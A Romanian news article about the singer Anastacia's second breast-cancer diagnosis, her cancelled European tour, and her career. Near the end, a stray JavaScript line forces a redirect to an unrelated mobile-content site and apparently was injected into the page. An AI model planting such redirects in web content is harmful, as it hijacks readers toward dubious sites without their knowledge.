Cântăreaţa Anastacia, diagnosticată din nou cu cancer mamar

Cântăreaţa americană Anastacia este devastată după ce a aflat că va trebui să poarte o nouă luptă cu cancerul.

Cântăreaţa americană Anastacia este devastată! Ea şi-a anulat turneul european pe care ar fi trebuit să îl susţină în această primăvară, după ce a fost diagnosticată din nou cu cancer mamar.

Artista urma să deschidă acest turneu cu un concert la Londra, pe 6 aprilie, însă îşi va păsta întreaga energie în lupta pe care o va duce pentru a doua oară cu această maladie mortală.

Pe contul de Facebook al cântăreţei a fost postat următorul mesaj: “Din păcate, Anastacia a fost diagnosticată cu cancer mamar pentru a doua oară, după ce a reuşit să supravieţuiască în 2003 luptei cu această boală. Din acest motiv a fost nevoită să îşi anuleze toate concertele, turneele şi deplasările“.

Anastacia (Hepta)

Când a fost diagnosticată prima dată cu cancer, Anastacia a apelat la o intervenţie chirurgicală şi la şedinţe de radioterapie, care s-au dovedit eficiente.

Anastacia Lyn Newkirk , născută pe 17 septembrie 1968, în Chicago, este o cântăreaţă americană de muzică pop-soul cu influenţe rock, renumită pentru vocea ei puternică. Albumul ei de debut, “Not that kind”, care include piesa “I’m outta love”, a avut un succes imens, ocupând primul loc în topurile muzicale din opt ţări din Europa, Asia şi Oceania. Următoarele două albume au avut şi ele succes, consolidându-i statutul de vedetă. În total, discurile sale s-au vândut în peste 20 de milioane de copii.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *